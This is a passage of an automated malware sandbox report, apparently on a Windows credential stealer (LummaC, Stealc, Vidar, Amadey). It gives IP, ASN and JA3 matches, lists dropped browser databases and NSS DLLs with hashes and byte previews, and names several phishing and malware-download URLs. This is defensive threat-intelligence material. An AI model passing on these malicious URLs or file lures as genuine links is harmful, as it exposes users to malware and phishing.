	file.exe	Get hash	malicious	LummaC, Stealc	Browse	185.215.113.16
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	185.215.113.16
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.206
	file.exe	Get hash	malicious	LummaC	Browse	185.215.113.16
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	185.215.113.206
CLOUDFLARENETUS	file.exe	Get hash	malicious	LummaC	Browse	188.114.96.3
	Setup.exe	Get hash	malicious	Unknown	Browse	1.1.1.1
	allpdfpro.msi	Get hash	malicious	Unknown	Browse	1.1.1.1
	BlackLizard3_crypted_LAB.exe	Get hash	malicious	LummaC	Browse	172.67.196.146
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	172.64.41.3
	https://xblgo.com	Get hash	malicious	Unknown	Browse	104.17.25.14
	https://u34251876.ct.sendgrid.net/ls/click?upn=u001.ordJ57g0HVndDa8Km-2BVUUFN1eIn5tdzIxrKbgsGfF9eVdl7b-2Fab-2BrUBdfIXH9yijR5LLM7kgivkgUI3nC3VajM00UDrq4ekI2XREqo0QmHcHyDyYWomvx9-2FHEtQ3o5rBM9AHzVSsjnwFSEJqic-2BEtw-3D-3DBxNa_qINdfz5Lp8EahgxJXfgGV-2Bk7caEgTUs2gtUTKNMgBkZ9mbVIMd-2B1UUN0TqdRRGrocW81C18onNWNx5Y6KM88Rr7odKCqMhALUPuUbXGlkOo01sEKeKdphXRhykHXKfSB-2By1s-2BNAgCL9-2BbtY8LNaKNV0sXQnlv-2F9fA-2BLZtaeadaVGHb32bFHhcOwS3ltfr2dig92MY6M8DrwwYiolgI1k4Q-3D-3D	Get hash	malicious	Unknown	Browse	104.17.24.14
	https://share365doc-hrabaddqf5fahba5.z03.azurefd.net/lastestbolodoc/doc.html	Get hash	malicious	HTMLPhisher	Browse	172.67.222.69
	file.exe	Get hash	malicious	LummaC	Browse	172.67.174.133
	file.exe	Get hash	malicious	LummaC	Browse	188.114.97.3
MICROSOFT-CORP-MSN-AS-BLOCKUS	amen.arm6.elf	Get hash	malicious	Mirai	Browse	52.237.139.198
	amen.x86.elf	Get hash	malicious	Mirai	Browse	21.63.49.151
	amen.arm.elf	Get hash	malicious	Unknown	Browse	22.85.218.160
	amen.mpsl.elf	Get hash	malicious	Mirai	Browse	21.74.53.23
	zgp.elf	Get hash	malicious	Mirai	Browse	13.66.197.191
	amen.m68k.elf	Get hash	malicious	Unknown	Browse	22.107.202.4
	amen.sh4.elf	Get hash	malicious	Mirai	Browse	22.56.53.91
	amen.spc.elf	Get hash	malicious	Mirai	Browse	20.92.146.129
	amen.ppc.elf	Get hash	malicious	Mirai	Browse	13.100.63.15
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	52.228.161.161

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
28a2c9bd18a11de089ef85a160da29e4	Setup.exe	Get hash	malicious	Unknown	Browse	20.109.210.53 184.28.90.27 40.126.32.68 13.107.246.45
	https://attack.mitre.org/techniques/T1204/001	Get hash	malicious	Lsass Dumper, Mimikatz, Trickbot	Browse	20.109.210.53 184.28.90.27 40.126.32.68 13.107.246.45
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	20.109.210.53 184.28.90.27 40.126.32.68 13.107.246.45
	https://xblgo.com	Get hash	malicious	Unknown	Browse	20.109.210.53 184.28.90.27 40.126.32.68 13.107.246.45
	https://u34251876.ct.sendgrid.net/ls/click?upn=u001.ordJ57g0HVndDa8Km-2BVUUFN1eIn5tdzIxrKbgsGfF9eVdl7b-2Fab-2BrUBdfIXH9yijR5LLM7kgivkgUI3nC3VajM00UDrq4ekI2XREqo0QmHcHyDyYWomvx9-2FHEtQ3o5rBM9AHzVSsjnwFSEJqic-2BEtw-3D-3DBxNa_qINdfz5Lp8EahgxJXfgGV-2Bk7caEgTUs2gtUTKNMgBkZ9mbVIMd-2B1UUN0TqdRRGrocW81C18onNWNx5Y6KM88Rr7odKCqMhALUPuUbXGlkOo01sEKeKdphXRhykHXKfSB-2By1s-2BNAgCL9-2BbtY8LNaKNV0sXQnlv-2F9fA-2BLZtaeadaVGHb32bFHhcOwS3ltfr2dig92MY6M8DrwwYiolgI1k4Q-3D-3D	Get hash	malicious	Unknown	Browse	20.109.210.53 184.28.90.27 40.126.32.68 13.107.246.45
	file.exe	Get hash	malicious	PureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	20.109.210.53 184.28.90.27 40.126.32.68 13.107.246.45
	http://invoicehome.uk/invoice.zip	Get hash	malicious	Unknown	Browse	20.109.210.53 184.28.90.27 40.126.32.68 13.107.246.45
	https://vinculocomputer.com/run/	Get hash	malicious	Unknown	Browse	20.109.210.53 184.28.90.27 40.126.32.68 13.107.246.45
	https://www.hopp.bio/hawksridgefarms	Get hash	malicious	Mamba2FA	Browse	20.109.210.53 184.28.90.27 40.126.32.68 13.107.246.45
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	20.109.210.53 184.28.90.27 40.126.32.68 13.107.246.45
3b5074b1b5d032e5620f69f9f700ff0e	https://u34251876.ct.sendgrid.net/ls/click?upn=u001.ordJ57g0HVndDa8Km-2BVUUFN1eIn5tdzIxrKbgsGfF9eVdl7b-2Fab-2BrUBdfIXH9yijR5LLM7kgivkgUI3nC3VajM00UDrq4ekI2XREqo0QmHcHyDyYWomvx9-2FHEtQ3o5rBM9AHzVSsjnwFSEJqic-2BEtw-3D-3DBxNa_qINdfz5Lp8EahgxJXfgGV-2Bk7caEgTUs2gtUTKNMgBkZ9mbVIMd-2B1UUN0TqdRRGrocW81C18onNWNx5Y6KM88Rr7odKCqMhALUPuUbXGlkOo01sEKeKdphXRhykHXKfSB-2By1s-2BNAgCL9-2BbtY8LNaKNV0sXQnlv-2F9fA-2BLZtaeadaVGHb32bFHhcOwS3ltfr2dig92MY6M8DrwwYiolgI1k4Q-3D-3D	Get hash	malicious	Unknown	Browse	176.9.192.202
	1731350144bd4661a80b2f6df430a3ec80a1cea4bfcea08062cabca8156532cd5eb6ec3f57216.dat-decoded.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	176.9.192.202
	AdobePDQ5.6.1.msi	Get hash	malicious	Unknown	Browse	176.9.192.202
	https://vinculocomputer.com/run/	Get hash	malicious	Unknown	Browse	176.9.192.202
	AdobeViewerPDQ5.5.msi	Get hash	malicious	Unknown	Browse	176.9.192.202
	seethebestthingswithgoodthingswithgreatthignsfor.hta	Get hash	malicious	Cobalt Strike, Remcos, HTMLPhisher	Browse	176.9.192.202
	seethebestthingswithentiretimeimadeforyousee.hta	Get hash	malicious	Cobalt Strike, FormBook, HTMLPhisher	Browse	176.9.192.202
	Ziraat_Bankasi_Swift_Mesaji_DXB04958T.bat	Get hash	malicious	AgentTesla, DBatLoader	Browse	176.9.192.202
	SSA-Statement.Client.exe	Get hash	malicious	ScreenConnect Tool	Browse	176.9.192.202
	Swift Copy.bat.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	176.9.192.202
a0e9f5d64349fb13191bc781f81f42e1	file.exe	Get hash	malicious	LummaC	Browse	23.210.122.61 172.67.174.133 23.197.127.21 188.114.96.3
	file.exe	Get hash	malicious	LummaC	Browse	23.210.122.61 172.67.174.133 23.197.127.21 188.114.96.3
	file.exe	Get hash	malicious	LummaC	Browse	23.210.122.61 172.67.174.133 23.197.127.21 188.114.96.3
	BlackLizard3_crypted_LAB.exe	Get hash	malicious	LummaC	Browse	23.210.122.61 172.67.174.133 23.197.127.21 188.114.96.3
	file.exe	Get hash	malicious	LummaC	Browse	23.210.122.61 172.67.174.133 23.197.127.21 188.114.96.3
	file.exe	Get hash	malicious	LummaC	Browse	23.210.122.61 172.67.174.133 23.197.127.21 188.114.96.3
	file.exe	Get hash	malicious	LummaC	Browse	23.210.122.61 172.67.174.133 23.197.127.21 188.114.96.3
	file.exe	Get hash	malicious	PureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	23.210.122.61 172.67.174.133 23.197.127.21 188.114.96.3
	file.exe	Get hash	malicious	LummaC	Browse	23.210.122.61 172.67.174.133 23.197.127.21 188.114.96.3
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	23.210.122.61 172.67.174.133 23.197.127.21 188.114.96.3

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\ProgramData\freebl3.dll	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	PureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	PureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	PureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse
C:\ProgramData\mozglue.dll	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	PureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	PureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	PureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse

Created / dropped Files

C:\ProgramData\AAKJEGCFBGDHJJJJJKJE

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	ASCII text, with very long lines (1743), with CRLF line terminators
Category:	dropped
Size (bytes):	9504
Entropy (8bit):	5.512408163813622
Encrypted:	false
SSDEEP:	192:nnPOeRnWYbBp6RJ0aX+H6SEXKxkHWNBw8D4Sl:PeegJUaJHEw90
MD5:	1191AEB8EAFD5B2D5C29DF9B62C45278
SHA1:	584A8B78810AEE6008839EF3F1AC21FD5435B990
SHA-256:	0BF10710C381F5FCF42F9006D252E6CAFD2F18840865804EA93DAA06658F409A
SHA-512:	86FF4292BF8B6433703E4E650B6A4BF12BC203EF4BBBB2BC0EEEA8A3E6CC1967ABF486EEDCE80704D1023C15487CC34B6B319421D73E033D950DBB1724ABADD5
Malicious:	false
Preview:	// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "9e34c6e7-cbed-40a0-ba63-35488e171013");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696426836);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696426837);..user_pref("app.update.lastUpdateTime.xpi-signature-verification

C:\ProgramData\BGIDBKKKKKFBGDGDHIDB

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\DGHCBAAE

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.136413900497188
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
MD5:	429F49156428FD53EB06FC82088FD324
SHA1:	560E48154B4611838CD4E9DF4C14D0F9840F06AF
SHA-256:	9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
SHA-512:	1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\DGIJECGDGCBKECAKFBGC

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	51200
Entropy (8bit):	0.8746135976761988
Encrypted:	false
SSDEEP:	96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
MD5:	9E68EA772705B5EC0C83C2A97BB26324
SHA1:	243128040256A9112CEAC269D56AD6B21061FF80
SHA-256:	17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
SHA-512:	312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\FIDHCFBA

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 10, database pages 91, cookie 0x36, schema 4, UTF-8, version-valid-for 10
Category:	dropped
Size (bytes):	196608
Entropy (8bit):	1.2645752257569107
Encrypted:	false
SSDEEP:	384:8/2qOB1nxCkMNSAELyKOMq+8yC8F/YfU5m+OlTLVumC:Bq+n0JN9ELyKOMq+8y9/Ow9
MD5:	A65D52F515F3AB25E5D6B616A1423DA0
SHA1:	8AB14345301793FE70775A48853B4517C359CA67
SHA-256:	5CA6E93C22FA0CDA94CB9A7FAF5B79DCBF0A1E9222AF7EFEEDAE68E6B454B415
SHA-512:	FF07EB16D210508D81E2923AB17B0A6520E7BD58523A09188111DF78E7C93068AA71171C615826A7B69BDA6FFEE9B771320BA08E91D184401854F73DEE83839E
Malicious:	false
Preview:	SQLite format 3......@ .......[...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\HIIIJDAAAAAAKECBFBAEBKJJJJ

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	5242880
Entropy (8bit):	0.03859996294213402
Encrypted:	false
SSDEEP:	192:58rJQaXoMXp0VW9FxWHxDSjENbx56p3DisuwAyHI:58r54w0VW3xWdkEFxcp3y/y
MD5:	D2A38A463B7925FE3ABE31ECCCE66ACA
SHA1:	A1824888F9E086439B287DEA497F660F3AA4B397
SHA-256:	474361353F00E89A9ECB246EC4662682392EBAF4F2A4BE9ABB68BBEBE33FA4A0
SHA-512:	62DB46A530D952568EFBFF7796106E860D07754530B724E0392862EF76FDF99043DA9538EC0044323C814DF59802C3BB55454D591362CB9B6E39947D11E981F7
Malicious:	false
Preview:	SQLite format 3......@ ...................&...................K..................................j.....-a>.~...\|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\IIEHCFIDHIDGIDHJEHIDAECFHD

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	98304
Entropy (8bit):	0.08235737944063153
Encrypted:	false
SSDEEP:	12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
MD5:	369B6DD66F1CAD49D0952C40FEB9AD41
SHA1:	D05B2DE29433FB113EC4C558FF33087ED7481DD4
SHA-256:	14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
SHA-512:	771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\freebl3.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	685392
Entropy (8bit):	6.872871740790978
Encrypted:	false
SSDEEP:	12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
MD5:	550686C0EE48C386DFCB40199BD076AC
SHA1:	EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
SHA-256:	EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
SHA-512:	0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\mozglue.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	608080
Entropy (8bit):	6.833616094889818
Encrypted:	false
SSDEEP:	12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
MD5:	C8FD9BE83BC728CC04BEFFAFC2907FE9
SHA1:	95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
SHA-256:	BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
SHA-512:	FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\msvcp140.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	450024
Entropy (8bit):	6.673992339875127
Encrypted:	false
SSDEEP:	12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
MD5:	5FF1FCA37C466D6723EC67BE93B51442
SHA1:	34CC4E158092083B13D67D6D2BC9E57B798A303B
SHA-256:	5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
SHA-512:	4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

C:\ProgramData\nss3.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2046288
Entropy (8bit):	6.787733948558952
Encrypted:	false
SSDEEP:	49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
MD5:	1CC453CDF74F31E4D913FF9C10ACDDE2
SHA1:	6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
SHA-256:	AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
SHA-512:	DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................\|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\softokn3.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	257872
Entropy (8bit):	6.727482641240852
Encrypted:	false
SSDEEP:	6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
MD5:	4E52D739C324DB8225BD9AB2695F262F
SHA1:	71C3DA43DC5A0D2A1941E874A6D015A071783889
SHA-256:	74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
SHA-512:	2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................\|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\vcruntime140.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	80880
Entropy (8bit):	6.920480786566406
Encrypted:	false
SSDEEP:	1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
MD5:	A37EE36B536409056A86F50E67777DD7
SHA1:	1CAFA159292AA736FC595FC04E16325B27CD6750
SHA-256:	8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
SHA-512:	3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...\|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\0ac2a0f3ae.exe.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	226
Entropy (8bit):	5.360398796477698
Encrypted:	false
SSDEEP:	6:Q3La/xw5DLIP12MUAvvR+uTL2ql2ABgTv:Q3La/KDLI4MWuPTAv
MD5:	3A8957C6382192B71471BD14359D0B12
SHA1:	71B96C965B65A051E7E7D10F61BEBD8CCBB88587
SHA-256:	282FBEFDDCFAA0A9DBDEE6E123791FC4B8CB870AE9D450E6394D2ACDA3D8F56D
SHA-512:	76C108641F682F785A97017728ED51565C4F74B61B24E190468E3A2843FCC43615C6C8ABE298750AF238D7A44E97C001E3BE427B49900432F905A7CE114AA9AD
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\3ee0641e-af09-48c5-83bf-083a082c4dcd.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	46012
Entropy (8bit):	6.088677253487925
Encrypted:	false
SSDEEP:	768:mMkbJrT8IeQcrQgx99yJuIhDO6vP6OwbqHpFbZ46EFXP/vP2185CAoCGoup1Xl3A:mMk1rT8HR99T6QOJAP2185RoChu3VlX6
MD5:	27BFBA4C8023705E3684C75B569E7700
SHA1:	3FBAB564571CB5CD3A97003E858D91AECCF69AD8
SHA-256:	9988119D2CD968C3E5D62174D2A8091AE15D5A0DD0847E2207D270FDAD498B03
SHA-512:	5B7D1A311222D3A750D92A740B00471B8A8F6753F543BEAA8CCBA7644680A06FCC6F29314EED3A1A769A94A141EE9EB2F7CD5CB23E5086B22A299CABAC623172
Malicious:	false
